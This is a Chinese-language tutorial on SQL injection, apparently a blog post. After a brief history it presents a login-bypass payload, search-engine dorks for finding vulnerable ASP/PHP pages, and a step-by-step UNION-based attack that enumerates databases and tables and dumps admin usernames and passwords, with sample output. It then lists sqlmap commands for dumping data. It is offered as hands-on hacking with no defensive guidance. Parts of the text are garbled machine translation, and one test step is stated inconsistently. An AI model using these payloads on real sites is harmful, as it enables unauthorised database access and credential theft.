所謂SQL注入，就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字串，最終達到欺騙伺服器執行惡意的SQL命令。具體來說，它是利用現有應用程式，將（惡意）的SQL命令注入到後臺資料庫引擎執行的能力，它可以通過在Web表單中輸入（惡意）SQL語句得到一個存在安全漏洞的網站上的資料庫，而不是按照設計者意圖去執行SQL語句。

SQL注入歷史

1998年12月， Rain Forest Puppy（RFP） 在Phrack 54上發表文章“NT Web Technology Vulnerabilities”，首次提到SQL注入； 1999年2月，Allaire發出警告 “Multiple SQL Statements in Dynamic Queries”； 1999年5月， RFP與Matthew Astley發出警告 “NT ODBC Remote Compromise”； 2000年2月，RFP發表文章 “How I hacked Packetstorm – A look at hacking  wwthreads via SQL”，披露如何利用SQL注入攻擊滲透Packetstorm網站； 2000年9月，David Litchfield在Blackhat會議上發表主題演講“Application Assessments on IIS” ； 2000年10月，Chip Andrews在

SQLSecurity.com 上發表“SQL Injection FAQ ”，首次公開使用“SQL注入”這個術語 ； 2001年4月，David Litchfield 在Blackhat會議上發表主題演講 “Remote Web Application Disassembly with ODBC Error Messages”； 2002年1月，Chris Anley發表論文“Advanced SQL Injection in SQL Server”，首次深度探討該類攻擊。 2002年6月，Chris Anley發表論文 “(more) Advanced SQL” ，補充同年1月發表的論文缺少的細節。 2004年Blackhat會議上， 

0x90.org釋出了SQL注入工具SQeaL ( Absinthe的前身)。

SQL現狀

自己動手，豐衣足食

a.繞過驗證，任意登入

使用者名稱：anything 密碼：‘ or 1=1 -- 原理： 如果直接拼接sql走庫驗證的話，sql如下 SELECT * From Table WHERE Name='XX' and Password='YY'  應用如上賬號密碼後，sql如下 SELECT * From Table WHERE Name='SQL inject' and Password='' or 1=1–' 下面來舉個栗子

b.域名注入

尋找注入點： 域名後直接拼接sql注入：inurl:asp?xxx= 、inurl:.php?xxx= post注入：inurl:ManageLogin.asp 、inurl:ManageLogin.php 以域名後直接注入為例，具體過程如下： 第一步，進行注入測試。 最簡單的方法就是 在連結後邊加上 and 1=1 和 and 1=2 如果在and 1=2 顯示頁面不正常，而在and 1=2下顯示正常，則證明 該連結存在注入點。 其原理是：一般查詢的語句為 select * from table where id=1 //按照這樣測試就成為了 select * from table where id=1 and 1=2 第二步，在找到注入點後， 猜解當前網頁的欄位數 Order by 6顯示正常 ；order 7 顯示不正常。說明欄位數為6 第三步，爆出當前連結的顯示位 //對應的數字就是顯示的位置,顯示位為 2和4 第四步，爆出資料庫的基本資訊。 http://xxx.cn/new.php?id=228 and 1=2 union select 1,2,3,concat(user(),0x20,database(),0x20,version()),5,6 使用者：[email protected] 資料庫名：people 版本：5.0.20a-log 爆出所有的資料庫： http://xxx.cn/new.php?id=228 and 1=2 union select 1,2,3,group_concat(distinct table_schema),5,6 from information_schema.columns 爆出資料庫名：information_schema,people,test information_schema資料庫是在MYSQL的版本5.0之後產生的，一個虛擬資料庫，物理上並不存在。nformation_schema資料庫類似與“資料字典”，提供了訪問資料庫元資料的方式，即資料的資料。比如資料庫名或表名，列型別，訪問許可權（更加細化的訪問方式）。information_schema是一個由資料庫的元資料組成的資料庫。裡面儲存的是MYSQL的資料庫基本資訊。並隨時改變。用於檢視資訊以及系統決策時作為重要的資訊提供者。 MYSQL的版本5.0以上版本，我們藉助information_schema資料庫，來獲取其他資料庫的資訊。用到了group_concat()函式，distinct引數起到了去掉重複顯示的作用。 第五部，根據資料庫表進行爆出所有資料庫的表名： http://xxx.cn/new.php?id=228 and 1=2 union select 1,2,3,group_concat(distinct table_name),5,6 from information_schema.tables where table_schema=database() admin1,answer,check,class,news,system,zhaoping 該頁面為news.php 其資料庫表肯定就是news表， 第六步，爆出admin1表裡欄位，再爆出的使用者資訊，登入後臺 把admin1進行hex（16進位制）的結果為：0x61646D696E31 爆出所有的欄位： 欄位為：id,admin,password,rank 再爆出 admin和password裡的值： http://xxx.cn/new.php?id=228 and 1=2 union select 1,2,3,group_concat(distinct+id,0x2b,admin,0x2b,password,0x2b,rank),5,6 from admin1

利用工具，簡單高效

工具名稱SQLMAP

sqlmap 是一個自動SQL 射入工具。它是可勝任執行一個廣泛的資料庫管理系統後端指印, 檢索遙遠的DBMS 資料庫, usernames, 桌, 專欄, 列舉整個DBMS, 讀了系統檔案和利用導致SQL 射入弱點的網應用程式設計的安全漏洞。 

基礎用法

./sqlmap.py -u “注入地址” -v 1 –dbs   // 列舉資料庫 ./sqlmap.py -u “注入地址” -v 1 –current-db   // 當前資料庫 ./sqlmap.py -u “注入地址” -v 1 –users    // 列資料庫使用者 ./sqlmap.py -u “注入地址” -v 1 –current-user  // 當前使用者 ./sqlmap.py -u “注入地址” -v 1 –tables -D “資料庫”   // 列舉資料庫的表名 ./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “資料庫”   // 獲取表的列名 ./sqlmap.py -u “注入地址” -v 1 –dump -C “欄位,欄位” -T “表名” -D “資料庫”   // 獲取表中的資料，包含列 已經開始拖庫了，SQLMAP是非常人性化的，它會將獲取的資料儲存sqlmap/output/中

總結

sql注入是需要緣分的，而程式設計師的疏忽就是月老的紅線